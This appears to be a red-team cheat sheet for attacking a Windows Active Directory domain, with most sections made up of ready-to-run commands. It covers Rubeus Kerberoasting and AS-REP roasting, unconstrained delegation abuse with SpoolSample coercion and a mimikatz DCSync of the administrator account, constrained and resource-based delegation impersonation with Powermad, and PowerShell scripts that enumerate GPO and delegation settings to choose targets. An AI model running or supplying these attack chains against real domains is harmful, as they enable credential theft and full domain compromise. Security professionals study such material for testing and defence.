# Domain Reconnaissance on Windows

#### GPO

Check for GPOs that grant a group of users remote access (PsExec, WMI, WinRM, RDP, etc.) to specific hosts. This is usually done by adding a domain group to the local Administrators, Remote Desktop Users or Remote Management Users group through Restricted Groups (`GptTmpl.inf`) or Group Policy Preferences (`Groups.xml`) in SYSVOL; resolve where the GPO is linked (OU, site, domain) to see which computers it actually applies to.
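
As an added example (not code from the original page), the following PowerShell parses the Restricted Groups section of a `GptTmpl.inf` and reports which principals the GPO pushes into the local groups that translate into remote access. The `.inf` text is constructed for the demo and its domain SID and RIDs are made up; the SYSVOL path in the comment uses the page's `red.com` domain and a placeholder GPO GUID.

```powershell
# Added example (not code from the original page): parse the Restricted Groups section of a
# GPO's GptTmpl.inf and report which principals it pushes into local groups that grant remote
# access. Read the real file from SYSVOL, e.g.
#   \\red.com\SYSVOL\red.com\Policies\{<GPO GUID>}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
# The .inf text below is constructed for the demo and its domain SID/RIDs are made up.

# Well-known local groups that mean remote access on every host the GPO applies to.
$RemoteAccessGroups = @{
    'S-1-5-32-544' = 'Administrators (PsExec, WMI, WinRM, RDP)'
    'S-1-5-32-555' = 'Remote Desktop Users (RDP)'
    'S-1-5-32-580' = 'Remote Management Users (WinRM)'
}

function Get-RestrictedGroupMembership {
    # Yields one object per (local group, principal) pair under [Group Membership].
    # Keys look like  *<SID>__Members = *<SID>,DOMAIN\Name   or  *<SID>__Memberof = *<SID>
    # A leading '*' marks a SID; anything else is a name the GPO engine resolves at apply time.
    param([Parameter(Mandatory)][string[]]$InfLines)

    $inSection = $false
    foreach ($line in $InfLines) {
        $t = $line.Trim()
        if ($t -match '^\[(.+)\]$') { $inSection = ($Matches[1] -eq 'Group Membership'); continue }
        if (-not $inSection -or -not $t) { continue }
        if ($t -notmatch '^(?<group>.+?)__(?<kind>Members|Memberof)\s*=\s*(?<value>.*)$') { continue }

        $group = $Matches['group'].TrimStart('*')
        $kind  = $Matches['kind']
        $items = $Matches['value'] -split ',' | ForEach-Object { $_.Trim().TrimStart('*') } | Where-Object { $_ }

        foreach ($item in $items) {
            # "__Members" replaces the keyed group's member list with the listed principals;
            # "__Memberof" nests the keyed group into each listed group, so the roles flip.
            if ($kind -eq 'Members') { $local = $group; $principal = $item } else { $local = $item; $principal = $group }
            $purpose = 'other'
            if ($RemoteAccessGroups.ContainsKey($local)) { $purpose = $RemoteAccessGroups[$local] }
            [pscustomobject]@{ LocalGroup = $local; Purpose = $purpose; Principal = $principal }
        }
    }
}

# Constructed sample of a Restricted Groups policy (not a real GPO).
$sampleInf = @'
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-1111111111-2222222222-3333333333-1105,RED\Helpdesk
*S-1-5-32-555__Memberof =
*S-1-5-32-555__Members = *S-1-5-21-1111111111-2222222222-3333333333-1120
'@ -split "`r?`n"

Get-RestrictedGroupMembership -InfLines $sampleInf |
    Where-Object { $_.Purpose -ne 'other' } |
    Format-Table LocalGroup, Purpose, Principal -AutoSize
```

Real `GptTmpl.inf` files are usually UTF-16, so read them with `Get-Content -Encoding Unicode`. Domain SIDs in the output can be resolved to names with `[System.Security.Principal.SecurityIdentifier]::new($sid).Translate([System.Security.Principal.NTAccount])` when the domain is reachable, and the GPO's `gPLink` scope tells you which hosts the mapping lands on.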

#### Kerberoasting

```
rubeus.exe kerberoast /user:svc_sql /nowrap
```

#### ASREPRoasting

```
rubeus.exe asreproast /format:hashcat /user:svc_sql /nowrap
```

#### Unconstrained Delegation

From a host that is trusted for unconstrained delegation (here `redsqlw`), running elevated so Rubeus can read tickets from other logon sessions: watch for the DC machine account's TGT, coerce the DC to authenticate to the host through the print spooler (the Spooler service must be running on `reddc`), inject the captured TGT and DCSync.

```
rubeus.exe monitor /interval:1 /filteruser:reddc$ /nowrap

Spoolsample.exe reddc redsqlw

rubeus.exe ptt /ticket:[ticket]

mimikatz # lsadump::dcsync /domain:red.com /user:RED\administrator
```

#### Constrained Delegation

Running as the account that has constrained delegation configured (here `svc_sql`, allowed to delegate to `time/redwebaw.red.com`): extract its TGT with `tgtdeleg`, then run S4U2self/S4U2proxy to impersonate a user to the target. `/altservice` swaps the service class because the ticket's `sname` sits outside the encrypted part. The chain only works when the account is set to "use any authentication protocol" (protocol transition); with Kerberos-only constrained delegation S4U2self returns a non-forwardable ticket that the KDC rejects in S4U2proxy.

```
rubeus.exe tgtdeleg /nowrap

rubeus.exe s4u /impersonateuser:kevin /user:svc_sql /domain:red.com /msdsspn:time/redwebaw.red.com /altservice:cifs,host,http,winrm /ticket:[ticket] /dc:reddc.red.com /ptt
```
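
To find the host for the Unconstrained Delegation step and the account and SPNs for the Constrained Delegation step, the delegation flags have to be read from AD first. The following is an added example (not code from the original page) covering both sections: it lists every account that is trusted for unconstrained delegation or has `msDS-AllowedToDelegateTo` set, marks whether protocol transition is enabled, and filters out domain controllers, which are unconstrained by design. It assumes a domain-joined context so `[adsisearcher]` can bind; it only reads.

```powershell
# Added example (not code from the original page): enumerate unconstrained and constrained
# delegation so you know where to run monitor/Spoolsample and which account to run s4u as.
# Assumes a domain-joined context; read-only.

$UF_SERVER_TRUST_ACCOUNT           = 0x2000     # domain controller computer account
$UF_TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation
$UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # "use any authentication protocol" (protocol transition)

function Get-DelegationTargets {
    $filter = '(|' +
              "(userAccountControl:1.2.840.113556.1.4.803:=$UF_TRUSTED_FOR_DELEGATION)" +
              '(msDS-AllowedToDelegateTo=*))'
    $searcher = [adsisearcher]$filter
    $searcher.PageSize = 1000
    foreach ($p in 'samaccountname','useraccountcontrol','msds-allowedtodelegateto','objectclass') {
        [void]$searcher.PropertiesToLoad.Add($p)
    }

    foreach ($r in $searcher.FindAll()) {
        $uac       = [int]$r.Properties['useraccountcontrol'][0]
        $allowedTo = @($r.Properties['msds-allowedtodelegateto'])

        # Kerberos-only constrained delegation cannot be abused with S4U2self alone; protocol
        # transition can; unconstrained needs a coerced authentication (e.g. the spooler).
        $kind = 'Constrained (Kerberos only)'
        if ($uac -band $UF_TRUSTED_TO_AUTH_FOR_DELEGATION) { $kind = 'Constrained + protocol transition' }
        if ($uac -band $UF_TRUSTED_FOR_DELEGATION)         { $kind = 'Unconstrained' }

        [pscustomobject]@{
            Account    = [string]$r.Properties['samaccountname'][0]
            Class      = ([string[]]$r.Properties['objectclass'])[-1]   # most specific class: user or computer
            Delegation = $kind
            IsDC       = [bool]($uac -band $UF_SERVER_TRUST_ACCOUNT)
            # Constrained: candidate values for /msdsspn. The service class can be swapped with
            # /altservice, the host part cannot.
            AllowedTo  = $allowedTo -join ';'
        }
    }
}

Get-DelegationTargets | Where-Object { -not $_.IsDC } |
    Format-Table Account, Class, Delegation, AllowedTo -AutoSize
```

An `Unconstrained` computer you can get local admin on is the `redsqlw` of the section above; a `Constrained + protocol transition` user whose credentials or session you hold is the `svc_sql` of the `s4u` command, with `AllowedTo` supplying the `/msdsspn` value.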

#### Resource Based Constrained Delegation

Needs write access to the target computer object (`red09`), enough to set `msDS-AllowedToActOnBehalfOfOtherIdentity` (GenericWrite, WriteProperty on that attribute, WriteDACL or ownership), plus a `ms-DS-MachineAccountQuota` above 0 (default 10) to create the controlled account `my$`. `/rc4` is the NT hash of that account's password (`rubeus.exe hash /password:...` computes it). No protocol transition is required: for RBCD the KDC accepts the non-forwardable S4U2self ticket.

```
Import-Module .\powermad.ps1

New-MachineAccount -MachineAccount my -Password $(ConvertTo-SecureString '123' -AsPlainText -Force)

Import-Module .\Microsoft.ActiveDirectory.Management.dll

Set-ADComputer red09 -PrincipalsAllowedToDelegateToAccount my$ -Server [DC IP] -Verbose

rubeus.exe s4u /user:my$ /rc4:…… /impersonateuser:administrator /msdsspn:CIFS/red09.red.com /ptt
```

#### Internal Web Service

Look for internal web services, starting with computers and users whose names contain "web", "svc", etc. If a service is not reachable directly, pivot to it over SOCKS.

Functionality to look for once you reach one:

- Send a phishing email
- Send a document
- Execute a command
- Ping a host
- DevOps
